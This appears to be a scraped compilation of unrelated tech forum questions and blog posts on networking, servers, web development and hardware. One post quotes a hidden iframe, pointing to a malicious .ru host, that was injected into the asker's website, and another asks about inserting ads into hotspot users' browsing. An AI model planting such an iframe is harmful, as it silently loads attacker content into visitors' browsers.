• Displaying ads over WiFi hotspot

  I have recently distributed my WiFi network with highpseed antennas to my area which covers almost 300-400 peoples. I am not charging them anything but i would like to generate some revenue through Advertisements placed on the websites that they visit. Is it possible to display ads from Google (I know i can do redirect the Advertisements, using some cache server or firewall) . Its just like a free vpn but i would like to have my advertisements above the websites they visit so i can take out the cost for the WiFi that i offer. Any suggestions would be great!

• Wake On Lan for Fedora 12

  I have a fedora 12 box that I am using as a sandbox for web development and a few other toys. The box gets really hot so I would like it to sleep/hibernate when no one is using it, however most of the people connecting to the box will not be able to access it physically. Is it possible to set up a Wake On Lan that wakes up the machine when it detects an SSH connection? A google search didn't yield much information. (or atleast I wasn't smart enough to register it as useful!)

• What could prevent one Amazon EC2 instance from pinging another instance's Private IP?

  I have multiple Amazon EC2 instances which need to communicate using private IPs. However, so far I've been unable to ping one instance's private IP from another instance. I can ping external addresses, such as their Elastic IPs and other sites (yahoo, google, etc), so it seems there's nothing wrong with the instances' network configuration. Also, they are all in the same zone, so that shouldn't be an issue. Does anyone have any idea what I could be doing wrong? Could this related to the Security Group settings?

  NOTE: I am self studying UML so I have nobody to verify my diagrams and hence I am posting here, so please bear with me. This is the problem I got from some PDF available on Google that simply had the following problem statement: Problem Statement: A library contains books and journals. The task is to develop a computer system for borrowing books. In order to borrow a book the borrower must be a member of the library. There is a limit on the number of books that can be borrowed by each member of the library. The library may have several copies of a given book. It is possible to reserve a book. Some books are for short term loans only. Other books may be borrowed for 3 weeks. Users can extend the loans. Draw a use case diagram for a library. I already drew the Use Case diagram and had it checked by a community member. This time I drew sequence diagrams for borrowing a book and extending the date of return. Please let me know if they are correct. I drew them using Visual Paradigm and I dont know how to keep a control of the sequence numbers. If you do, please let me know :) Diagrams

• Multiple Schedule/Task Views (devs, customer, etc) in MS Project (or other)

  Is there a way to configure multiple views/filters in MS Project for the same set of tasks? I want to have a view that is configured for customer's only, for example. So, it would have large milestone tasks only, and hide all of the details that are there for the benefit of the team members. If MS Project doesn't do this, is there any project management software that does? A free/open source version would be preferable. Edit: Apparently, "filter" was the word I needed in my Google searches. I found how to mark a task as a Milestone and use the pre-made Milestone filter. However, that still doesn't hide non-Milestone tasks the way I want it to. I haven't figured out how to make a true custom filter.

  First, sorry my noobs questions, but I'm mainly Windows Developer and not Web Developer :) I'm developing a single page application with a lot of css & javascript. For now the page is 1.3Mo composed by 5 section. Here are the rounded stats : Document : 10kb Style : 60kb Images : 450 kb (already compressed, include a big gallery thumbnails) Javascript : 700kb - 600kb of "framework" (jquery, jquery-ui, boostrap, modernizer, waypoint, ...) and 100kb of custom js. Fonts : 125kb And the site is not finished yet. (Will include gmap api, and some others...) My questions are : Do you have any statistics about the average weight of an SPA ? As this is the whole website, do you think it's acceptable ? Is lazy load (for images) a solution ? What will be impact for SEO ? Is the "200kb rule" of google still relevant ? Do you know great tools to detect which javascript code is not used during the the exection of a page and then the availability to optimize these 700kb of framework js stuffs ? • apache not displaying php pages, offering them for download instead.

  Hi folks, we are trying to setup apache (apache 2 in this case, although apache does the same thing) and html pages display just fine, however, any php pages linked into buttons on the front page are offered for download rather than being displayed. Any ideas what we have missed? Its proving difficult to search on this in google as the terms are so heavily used elsewhere. I know this is a bit general, but we have tried adding types to the to the apache.conf (or httpd.conf for apache1) are having no joy at all. Thanks. Peter.

• Blogging After The Blog Boom

  I have been blogging on Geeks With Blogs since 2005 and on other blogging sites before that.  In this age of Twitter, Facebook and G+ it feels like we are in the post-blog age and yet here I continue.  There are several reasons for this.  The first is that I still find it to be the best place for self publishing long form thought that won’t fit well on Twitter or Facebook.  Google+ allows for this type of content, but it suffers from the same scroll factor as the other social media platforms.  If you aren’t looking at the right moment you miss it.  On a blog I can put complete thoughts with examples and people can find what they want via key words or search engine. The second reason I blog is to have a place for me to put information I want to be able to reference back to later.  Although I use OneNote which is now accessible everywhere the blog gives me somewhere to refer co-workers and clients when I have solutions for problems I have previously solved. I know that other people use their blog as a resume builder, but that hasn’t been one of my primary concerns.  Don’t get me wrong.  Opportunities do come up because you put out well thought out, topical material.  That just isn’t one of my top motivators. I don’t always find the time to blog or even have anything to say lately, but I will continue to produce content for myself and others to learn from and hopefully enjoy. del.icio.us Tags: Blogging,Social Media

• How to stabilize PCIe sound card in its card slot?

  I have a Soundblaster Recon 3d Fatal1ty sound card and randomly every once in a while my computer won't recognize it. I am almost 100% sure it is something to do with its PCIe slot. After I turn off the computer and just wiggle the card a bit, the computer recognizes the card once I restart. I can't really try it in the other PCIe slot because the video card gets in the way. It is a Biostar TA970XE motherboard. I don't know if it is something to do with the pins on the actual card or if it is something to do with the slot. I couldn't find any related issues about this card on Google. Is there anything I can do to help secure the card in its slot so that my computer will recognize it? Any help is appreciated.

• Adding IP address to OpenVZ VPS (OpenVZ Web Panel)

  I apologise if I sound at all dumb. This is my first dedicated server having used a VPS for over a year and I'm trying to setup a VPS on this new server. I purchased a subnet from my hosting provider that I believe allows me 6 usable IP addresses: 177.xx.xxx.201 - 177.xx.xxx.206 The subnet address looks like this: 177.xx.xxx.200/29. I've gone on my server and added them like it said on a wiki like so: ip addr add 177.**.***.201/29 dev eth0 I done that for all six and now when I go to them in the browser they point to my server. The problem is, I'm using OpenVZ web panel to create VMs (http://code.google.com/p/ovz-web-panel/) so I created a VM and assigned one of those IPs to it. However when SSHing to that IP it SSH's to the dedicated server and not the VM. Am I missing something?

• Database – Beginning with Cloud Database As A Service

  I love my weekend projects. Everybody does different activities in their weekend – like traveling, reading or just nothing. Every weekend I try to do something creative and different in the database world. The goal is I learn something new and if I enjoy my learning experience I share with the world. This weekend, I decided to explore Cloud Database As A Service – Morpheus. In my career I have managed many databases in the cloud and I have good experience in managing them. I should highlight that today’s applications use multiple databases from SQL for transactions and analytics, NoSQL for documents, In-Memory for caching to Indexing for search.  Provisioning and deploying these databases often require extensive expertise and time.  Often these databases are also not deployed on the same infrastructure and can create unnecessary latency between the application layer and the databases.  Not to mention the different quality of service based on the infrastructure and the service provider where they are deployed. Moreover, there are additional problems that I have experienced with traditional database setup when hosted in the cloud: Database provisioning & orchestration Slow speed due to hardware issues Poor Monitoring Tools High network latency Now if you have a great software and expert network engineer, you can continuously work on above problems and overcome them. However, not every organization have the luxury to have top notch experts in the field. Now above issues are related to infrastructure, but there are a few more problems which are related to software/application as well. Here are the top three things which can be problems if you do not have application expert: Replication and Clustering Simple provisioning of the hard drive space Automatic Sharding Well, Morpheus looks like a product build by experts who have faced similar situation in the past. The product pretty much addresses all the pain points of developers and database administrators. What is different about Morpheus is that it offers a variety of databases from MySQL, MongoDB, ElasticSearch to Reddis as a service.  Thus users can pick and chose any combination of these databases.  All of them can be provisioned in a matter of minutes with a simple and intuitive point and click user interface.  The Morpheus cloud is built on Solid State Drives (SSD) and is designed for high-speed database transactions.  In addition it offers a direct link to Amazon Web Services to minimize latency between the application layer and the databases. Here are the few steps on how one can get started with Morpheus. Follow along with me.  First go to http://www.gomorpheus.com and register for a new and free account. Step 1: Signup It is very simple to signup for Morpheus. Step 2: Select your database   I use MySQL for my daily routine, so I have selected MySQL. Upon clicking on the big red button to add Instance, it prompted a dialogue of creating a new instance.   Step 3: Create User Now we just have to create a user in our portal which we will use to connect to a database hosted at Morpheus. Click on your database instance and it will bring you to User Screen. Over here you will notice once again a big red button to create a new user. I created a user with my first name.   Step 4: Configure your MySQL client I used MySQL workbench and connected to MySQL instance, which I had created with an IP address and user.   That’s it! You are connecting to MySQL instance. Now you can create your objects just like you would create on your local box. You will have all the features of the Morpheus when you are working with your database. Dashboard While working with Morpheus, I was most impressed with its dashboard. In future blog posts, I will write more about this feature.  Also with Morpheus you use the same process for provisioning and connecting with other databases: MongoDB, ElasticSearch and Reddis. • Can't type into some text fields in any browser on Windows 7

  I can't type into e.g. facebook's log in form with my computer. I hit my keys, but nothing happens. Special characters like c, c, š, etc. work. Backspace doesn't, delete does. This goes for Internet Explorer, Firefox and Chrome. This also happens with some other sites, sometimes even with gmail (or any google's log in form). I read somewhere that the solution is to reregister some dlls: regsvr32 mshtmled.dll regsvr32 jscript.dll regsvr32 /i mshtml.dll The first two work, the third one says The module "mshtml.dll" was loaded but the entry-point DllRegisterServer.dll was not found. And of course, running just the first two didn't help. Does anyone know how to fix this problem?

• Switching from Java/Java EE career path to C POS path?

  I am a Java/Java EE Developer with about 3 years in this field. I like low-level programming so much... I favor back-end code over front-end. I've a knowledge in C and know little about C++. I got an offer to work with C in Point-of-Sale Payment terminals. I don't know much about how POS works (IDE/toolsets, etc). although I have a payment experience (ISO8583, etc...) I need you own opinion from Switching from the Java's High-level world to POS low-level world Although I love low-level world, but I am afraid from not being found what I seek.. I know programmers are not measured by the tools they use (including prog. langs.) but with their minds. I need your opinions of: Is programming POS terminals in C is an interesting thing, or I'll find myself doing usual code-writing job? (especially I am about to switch my whole career path). I find myself writing an elegant code in Java (like: Sobat http://code.google.com/p/sobat/) a code where I find myself in... So do I'll find the same thing in POS C? or It will all about Libraries that I'll call to finish my work?! Lastly, does this thing worse adventure with my current career (stability, conference, etc.. )? (as I currently don't think to move to a new job) Thanks.

  A website of mine has recently been infected with some sort of attack that involved injecting a hidden iframe, and it's source was from a site q5x.ru (do not link). A Google search didn't help me in figuring out how this attack my have took place, so I was wondering if anyone of you may have encountered this same problem? The iframe code was something of the sort: <iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe> As per request, I am running an ASP.Net website with a database, and as regards forms, it's obviously the ASP.Net form that's used for postbacks.

• Is it possible for root to execute a command as non-root

  I am root user and suppose i want to run any application as another user. is it possible, without switching to another user. Something like # google-chrome user=abc I am actually executing a cli program as a non root user. I have set the sticky bit on and i am using setuid. So the program runs with root privileges. Now i am using system() with in the program to invoke gui app. But i dont want to run it as root. so i want to temporarily drop root privileges only for that call.

• The Cloud is STILL too slow!

  If you've been in the computing industry sufficiently long enough to remember dialup modems and other "ancient" technologies, you might be tempted to marvel at today's wonderfully powerful multicore PCs, ginormous disks, and blazingly fast networks.  Wow, you're in Internet Nirvana, right!  Well, no, not by a long shot.Considering the exponentially growing expectations of what the Web, that is, "the Cloud", is supposed to provide, today's Web/Cloud services are still way too slow.Already we are seeing cloud-enabled consumer devices that are stressing even the most advanced public network services.  Like the iPad and its competitors, ever more powerful smart-phones, and an imminent hoard of special purpose gadgets such as the proposed "cloud camera" (see http://gdgt.com/discuss/it-time-cloud-camera-found-out-cnr/ ).And at the same time that the number and type of cloud services are growing, user tolerance for even the slightest of download delays is rapidly decreasing.  Ten years ago Web developers followed the "8-Second Rule", (average time a typical Web user would tolerate for a page to download and render).  Not anymore; now it's less than 3 seconds, and only a bit longer for mobile devices (see http://www.technologyreview.com/files/54902/GoogleSpeed_charts.pdf).  How spoiled we've become!Google, among others, recognizes this problem and is working to encourage the development of a faster Web (see http://www.technologyreview.com/web/32338/). They, along with their competitors and ISPs, will have to encourage and support significantly better Web performance in order to provide the types of services envisioned for the Cloud.  How will they do this? Through the development of faster components, better use of caching technologies, and the really tough one - exploiting parallelism. Not that parallel technologies like multicore processors are hard to build...we already have them.  It's just that we're not that good yet at using them effectively.  And if we don't get better, users will abandon cloud-based services...in less than 3 seconds.

• Enabling Session Directory under Terminal Server Configuration Tool and Server Settings

  Yello, I'm trying to add up a Terminal Server Session Directory client to an already fully functional Session Directory cluster which today runs two clients as well as the server. I've been reading up on both Google, Microsoft KB's as well as old documentation from an earlier employee but to no avail. The step I'm stuck at is when I open up Terminal Server Configuration Tool (tscc.msc), chooses ServerSettings. I know there should be an option saying "Session Directory" on the right hand side along with Active Desktop, Licensing and whatnot, but it's not there. I've logged on to both the other already functional clients and checked the same list and there the Session Directory option sure is both visible as well as working good with the specified information. This picture is the same view that I'm looking at at the moment, but mine is missing the bottom option that says "Session Directory" http://www.inetnj.com/doc/images/TerminalServerConfiguration.jpg Any help would be greatly appriciated.   I've been looking into the details behind these two different categories: Web runtime environments Web application programming languages I believe I have the correct information and have phrased it correctly but I am unsure. I have been searching for a while but only find snippets of information or what I can see as useless information (I could be wrong). Here are my descriptions so far: Web runtime environments - A Run-time environment implements part of the core behaviour of any computer language and allows it to be modified via an API or embedded domain-specific language. A web runtime environment is similar except it uses web based languages such as Java-script which utilises the core behaviour a computer language. Another example of a Run-time environment web language is JsLibs which is a standable JavaScript development runtime environment for using JavaScript as a general all round scripting language. JavaScript is often used to create responsive interfaces which improve the user experience and provide dynamic functionality without having to wait for the server to react and direct to another page. Web application programming languages - A web application program language is something that mimics a traditional desktop application within a web page. For example, using PHP you can create forms and tables which use a database similar to that of Microsoft Excel. • How can I use the shell to make my mp3s a Shoutcast source?

  I'm looking to stream a directory of mp3s from my audio source (Debian server) to my Shoutcast server. The idea is to have an archive playing in the instance that someone isn't broadcasting live. I'm not sure how to continue. I started with extensive Google-ing, and was unable to come up with a solution. Evan Carroll suggested I try here. I appreciate any insight y'all may have. __ On a side note, "users with less than 100 reputation can't create new tags. The tags 'shoutcast-source shoutcast broadcasting' are new. Try using existing tags instead." -- Who can create these?

They identified several issues and instructed the following to correct the issues: Problem: SSL Server Supports Weak Encryption for SSLv3, TLSv1, Solution: Add the following rule to httpd.conf SSLCipherSuite ALL:!aNULL:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM Problem: SSL Server Supports CBC Ciphers for SSLv3, TLSv1 Solution: Disable any cipher suites using CBC ciphers Problem: SSL Server Supports Weak MAC Algorithm for SSLv3, TLSv1 Solution: Disable any cipher suites using MD5 based MAC algorithms I tried searching google for a comprehensive tutorial on how to construct an SSLCipherSuite directive to meet my requirements, but I didn't find anything I could understand. I see examples of SSLCipherSuite directives, but I need an explanation on what each component of the directive does. So even in the directive SSLCipherSuite ALL:!aNULL:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM, I dont understand for example what the !LOW means. Can someone either a) tell me the SSLCipherSuite directive that will meet my needs or b) show me a resource that clearly explains each segment of a SSLCipherSuite is and how to construct one?
